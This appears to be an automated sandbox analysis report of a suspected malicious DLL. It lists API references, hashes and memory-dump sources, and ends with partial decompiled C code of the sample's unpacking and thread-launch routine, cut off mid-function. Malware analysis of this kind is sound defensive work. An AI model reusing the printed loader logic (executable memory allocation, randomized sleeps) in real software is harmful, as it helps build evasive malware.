                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 1740715915-731774800
                                                                                                                                                                                                                                                              • Opcode ID: 1eeead3c6870d0c88a81e7958a376a8111e416108ebdddd480f7da9cc7db7347
                                                                                                                                                                                                                                                              • Instruction ID: 3f96966e916fc6aae95d4a93a7f1fd0844c7ddb89262a95d318546c867919952
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1eeead3c6870d0c88a81e7958a376a8111e416108ebdddd480f7da9cc7db7347
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C251D17660460FDFEB1D9FD9CA50BAA7BAAEF02705F104929E815462D4D731E860CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E25120C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                                              • API String ID: 0-1872383224
                                                                                                                                                                                                                                                              • Opcode ID: bdb415f4945ab409c4e6a9987e6e15b795458757d5cd1c3de59f2b2b806a0c71
                                                                                                                                                                                                                                                              • Instruction ID: 236c4c828d092802a2122237360690147cd77cbd8ffd86e20c3279554e2a0014
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdb415f4945ab409c4e6a9987e6e15b795458757d5cd1c3de59f2b2b806a0c71
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64217175614A2EBF97005FE59E80D9677AFAB0536D7004D14F918D6350E731ECA88BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557C7
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557D9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557EB
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2557FD
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25580F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: d49535a4ef8ca49a0275abb315b68194c4567bf6e5752b47c39ad4faf8bbe7ea
                                                                                                                                                                                                                                                              • Instruction ID: a15ec74f0178b7d0881183cce415230650c0017c5e4b970fb49a7c44440e13dd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d49535a4ef8ca49a0275abb315b68194c4567bf6e5752b47c39ad4faf8bbe7ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6F0143148260EDBAB94DB98E599C5B33EFBF027127610809F41CD7600DB20F8C08EA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                              • String ID: *?
                                                                                                                                                                                                                                                              • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                              • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                              • Instruction ID: b30e9e0bd04a8794e4232530a9a68b1ad97f1d27e4af14efd3295dc37289e90e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14614AB5D0021E9FDB14CFA8C9809EDFBFAEF49314B24856AD815E7304E775AE418B90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6E248E5F
                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6E248F13
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                              • String ID: csm$y$n
                                                                                                                                                                                                                                                              • API String ID: 3480331319-3383992723
                                                                                                                                                                                                                                                              • Opcode ID: 6248558af29b3498b685ee2a764a1bf4bcbfa740e81ea6918b6f00023aa46b75
                                                                                                                                                                                                                                                              • Instruction ID: 20438a87cde174028c6bce8ef5fe25aeaf0dc456d7db6a3bf8fbddcbef05f307
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6248558af29b3498b685ee2a764a1bf4bcbfa740e81ea6918b6f00023aa46b75
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D41B335A2021EEBCF08DFA8C884A9EBBB7BF45318F048455F9185B351D7319915CBD1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 6E2498AB
                                                                                                                                                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 6E249991
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                                              • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                              • Opcode ID: b59250a37a04372f19d6f5f2e52db9df2855a4d4711f3d18ad78ec8234a419ff
                                                                                                                                                                                                                                                              • Instruction ID: aab345bd216e8d699692a67c7b05338f37ed5afa904620924ba77f143874294a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b59250a37a04372f19d6f5f2e52db9df2855a4d4711f3d18ad78ec8234a419ff
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1141387190020FEFDF0ACFD4CE80AEE7BB6BF48305F144459E91866255D335A960DB50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,6E27947C,00000000,?,?,6E24C2C2,?,?,6E24C28A,?,?,?), ref: 6E24C325
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,6E279494), ref: 6E24C338
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6E24C2C2,?,?,6E24C28A,?,?,?), ref: 6E24C35B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 4061214504-731774800
                                                                                                                                                                                                                                                              • Opcode ID: ae4b65a0439839baf4bdbd87f1984ac23a858059e467356d9c5360f8ef6ccc3d
                                                                                                                                                                                                                                                              • Instruction ID: c2e646ddcdb8429db76bdfb22996f743dc8bc1929255a498ffe9d22f50f85f6e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae4b65a0439839baf4bdbd87f1984ac23a858059e467356d9c5360f8ef6ccc3d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DF08C31500A2EFBEF119BA5CA1EBDD7F7AEB00B66F044060A915A5150CB758E54EAA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E256DAD
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E256DD6
                                                                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000,6E254603,00000000,6E24FCD2,?,?,?,?,?,?,?,6E254603,6E24FCD2,00000000), ref: 6E256E08
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6E254603,6E24FCD2,00000000,?,?,?,?,00000000,?), ref: 6E256E24
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1547350101-0
                                                                                                                                                                                                                                                              • Opcode ID: 9ce6cc76ca78134dc92a242918aefe7054f39062262ef4cf15f3d5a555cff972
                                                                                                                                                                                                                                                              • Instruction ID: 8222d74da1436e52c1e8dcb4a1c1ee6ccec66fabc002efa1c256ae6595cb219f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ce6cc76ca78134dc92a242918aefe7054f39062262ef4cf15f3d5a555cff972
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1141C27692160E9BDB415FF8CE80FCD377BAF46365F140D10E824A73A4EB35D8208A61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E2510C1: _free.LIBCMT ref: 6E2510CF
                                                                                                                                                                                                                                                                • Part of subcall function 6E251C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E24F667,00000000,00000001,6E24F5F6,6E253EDB,?,6E24F667,?,00000000,?,6E253C4A,0000FDE9,00000000,?), ref: 6E251CBC
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E250B07
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E250B0E
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E250B4D
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E250B54
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 167067550-0
                                                                                                                                                                                                                                                              • Opcode ID: ff7a087e773d734cc58cccf2d49463829b48733a0d021319afba073dfef6afad
                                                                                                                                                                                                                                                              • Instruction ID: 4f5b6ace61cfcbd5bed1309608b52992b8fc5a58fcfa4d7cb13b051f5542960c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff7a087e773d734cc58cccf2d49463829b48733a0d021319afba073dfef6afad
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0521A1B560461EAF9B109FE68ED0C9BB7AFEF0136D7108915F91997340E731EC608BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f03b424a33fbf30c51886c42bf5c6badee14af131e76dbd68f5da647e0325049
                                                                                                                                                                                                                                                              • Instruction ID: 6fa47e40a780d8f55e4dc70e6ed752161858b3cd09e2e4647465ecddc0323eaa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f03b424a33fbf30c51886c42bf5c6badee14af131e76dbd68f5da647e0325049
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20210B71A11A2AEBCF129FE59E44B5A376B9B02765F210510EC15A7380D770E968C5E0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,6E253991,?,00000001,6E24F667,?,6E253E50,00000001,?,?,?,6E24F5F6,?,?), ref: 6E24D3B1
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D40E
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D444
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6E2800D0,000000FF,?,6E253E50,00000001,?,?,?,6E24F5F6,?,?,?,6E27EBD8,0000002C,6E24F667), ref: 6E24D44F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                                              • Opcode ID: 5cdd5d5b5196b44745b9ce38516fa511bfa332775eba2a21ea7d025fc8ffe257
                                                                                                                                                                                                                                                              • Instruction ID: 3a257786185b03f9f8f6d8d847e9e26fcefdaa92b1543fbfeb825a5efc82ecff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cdd5d5b5196b44745b9ce38516fa511bfa332775eba2a21ea7d025fc8ffe257
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB11087620570EEBEB4817E4DC84E5B222F9BC2679F240A24F924532C0EFE198148D31
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,00000001,6E280096,6E24D67C,6E24D707,6E280094,?,6E247E19,6E280096,6E280094,?,?,?,6E244DCE,00000001,6E280098), ref: 6E24D508
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D565
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D59B
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6E2800D0,000000FF,?,6E247E19,6E280096,6E280094,?,?,?,6E244DCE,00000001,6E280098), ref: 6E24D5A6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2283115069-0
                                                                                                                                                                                                                                                              • Opcode ID: 417e3145ef484eadfa4e1ef25aeacc02de3b127b72b9d7947b2113d2824576b1
                                                                                                                                                                                                                                                              • Instruction ID: 3fbe758ef5b3d0dfee114181d74410be0e1429a27142f33ae9a0a033b7e5afb3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 417e3145ef484eadfa4e1ef25aeacc02de3b127b72b9d7947b2113d2824576b1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA110D762417099FEB4817F5DC84F5B126F97C367DB200B24F528972C0DFA18818C930
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,6E24A304,?,?,6E28C7C4,00000000,?,6E24A42F,00000004,6E2793A4,6E27939C,6E2793A4,00000000), ref: 6E24A2D3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                                                              • Opcode ID: 094aaf7dc9c5d0b9492766a295a3e0a2a94a1808b97f6b686fe6627315d2b9fc
                                                                                                                                                                                                                                                              • Instruction ID: f45c24725413bfac0acecefa81037dbe33f43e12206f538f9db9a3d623fcb14d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 094aaf7dc9c5d0b9492766a295a3e0a2a94a1808b97f6b686fe6627315d2b9fc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211E7B1A51A3BEBDF56CBE8CC44B4933A6AB06771F110131ED10AB280F771E900D6E5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,6E24F667,00000000,?,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001), ref: 6E257C03
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000,00000001,?,6E253E74,6E24F5F6), ref: 6E257C0F
                                                                                                                                                                                                                                                                • Part of subcall function 6E257BD5: CloseHandle.KERNEL32(6E280910,6E257C1F,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000,00000001), ref: 6E257BE5
                                                                                                                                                                                                                                                              • ___initconout.LIBCMT ref: 6E257C1F
                                                                                                                                                                                                                                                                • Part of subcall function 6E257B97: CreateFileW.KERNEL32(6E27DD58,40000000,00000003,00000000,00000003,00000000,00000000,6E257BC6,6E256B6D,00000001,?,6E253920,00000000,?,00000001,00000000), ref: 6E257BAA
                                                                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(?,?,6E24F667,00000000,?,6E256B80,?,00000001,?,00000001,?,6E253920,00000000,?,00000001,00000000), ref: 6E257C34
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                                                                                                              • Opcode ID: b8a3c2d4f3e027c01c4519c95c00a2e43dd96b32b4bbfd7e1e847355b424f5e8
                                                                                                                                                                                                                                                              • Instruction ID: 0fad53ec8f39865773cb05afd6fdcb7d093020679fa9ef379c28d833fdf3d6f3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8a3c2d4f3e027c01c4519c95c00a2e43dd96b32b4bbfd7e1e847355b424f5e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F01C3615252DBBDF221FD1CD0CD8E3F67FB4A7A1F048410FA29952A0D6328930DBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                                              • API String ID: 0-1872383224
                                                                                                                                                                                                                                                              • Opcode ID: 501f590428818e887053cf3f6616a71a42033faa34f44bd7d3758850a7eff650
                                                                                                                                                                                                                                                              • Instruction ID: 1ad3c28a8a6d09b50ad11c6972f6dde0f9bedd6cfce1a7e547426059725078ce
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 501f590428818e887053cf3f6616a71a42033faa34f44bd7d3758850a7eff650
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2341B675A4061DEFEB15DBDDCD819AEBBBEEF86B10F104566E4049B200DB704A48CB54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6E281E18), ref: 6E282480
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6E281E7C), ref: 6E2824B7
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6E282517
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E28254D
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(6E200000,00000000,00000004,6E2823A2), ref: 6E282652
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(6E200000,00001000,00000004,6E2823A2), ref: 6E282679
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,6E2823A2), ref: 6E282746
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,6E2823A2,?), ref: 6E28279C
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2827B8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471635972.000000006E281000.00000040.00020000.sdmp, Offset: 6E281000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2574235972-0
                                                                                                                                                                                                                                                              • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                              • Instruction ID: 4b26e144eb0f30125ca8cf8778d3c913a39bd59d814e1bc44f7fea5d4559b8e0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CD1A1762002869FDF05CF54C880F5277A6FF48710B0A45A4EE0AAF79BE771B854DB62
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                                                                                                              			E6E2017A7(intOrPtr _a4) {
                                                                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                                                                              				struct _SYSTEMTIME _v44;
                                                                                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                                                                                              				long _v52;
                                                                                                                                                                                                                                                              				long _v56;
                                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                                              				long _t21;
                                                                                                                                                                                                                                                              				int _t23;
                                                                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                                                                              				long _t27;
                                                                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                                                                                              				intOrPtr _t44;
                                                                                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                                                                                              				void* _t50;
                                                                                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                                                                                              				intOrPtr* _t57;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t21 = E6E20146C();
                                                                                                                                                                                                                                                              				_v52 = _t21;
                                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                                              					L18:
                                                                                                                                                                                                                                                              					return _t21;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					goto L1;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                                              					L1:
                                                                                                                                                                                                                                                              					GetSystemTime( &_v44);
                                                                                                                                                                                                                                                              					_t23 = SwitchToThread();
                                                                                                                                                                                                                                                              					asm("cdq");
                                                                                                                                                                                                                                                              					_t45 = 9;
                                                                                                                                                                                                                                                              					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                                                                                                              					_t26 = E6E2015A3(0, _t54); // executed
                                                                                                                                                                                                                                                              					_v56 = _t26;
                                                                                                                                                                                                                                                              					Sleep(_t54 << 5); // executed
                                                                                                                                                                                                                                                              					_t21 = _v56;
                                                                                                                                                                                                                                                              				} while (_t21 == 0xc);
                                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                                              					goto L18;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t27 = E6E201C12(_t45);
                                                                                                                                                                                                                                                              				_v52 = _t27;
                                                                                                                                                                                                                                                              				if(_t27 != 0) {
                                                                                                                                                                                                                                                              					L16:
                                                                                                                                                                                                                                                              					_t21 = _v52;
                                                                                                                                                                                                                                                              					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                              						_t21 = GetLastError();
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					goto L18;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                                              					_t56 = E6E201CA4(E6E2016EC,  &_v28);
                                                                                                                                                                                                                                                              					if(_t56 == 0) {
                                                                                                                                                                                                                                                              						_v56 = GetLastError();
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                                                                                                                              						_v56 = _t31;
                                                                                                                                                                                                                                                              						if(_t31 == 0) {
                                                                                                                                                                                                                                                              							GetExitCodeThread(_t56,  &_v56);
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						CloseHandle(_t56);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				if(E6E201D7C(_t45,  &_v48) != 0) {
                                                                                                                                                                                                                                                              					 *0x6e2041b8 = 0;
                                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t44 = _v48;
                                                                                                                                                                                                                                                              				_t57 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                                              				_t50 =  *_t57(_t44, 0, 0);
                                                                                                                                                                                                                                                              				if(_t50 == 0) {
                                                                                                                                                                                                                                                              					L9:
                                                                                                                                                                                                                                                              					 *0x6e2041b8 = _t44;
                                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t15 = _t50 + 2; // 0x2
                                                                                                                                                                                                                                                              				_t39 = E6E201C8F(_t50 + _t15);
                                                                                                                                                                                                                                                              				 *0x6e2041b8 = _t39;
                                                                                                                                                                                                                                                              				if(_t39 == 0) {
                                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					 *_t57(_t44, _t39, _t50);
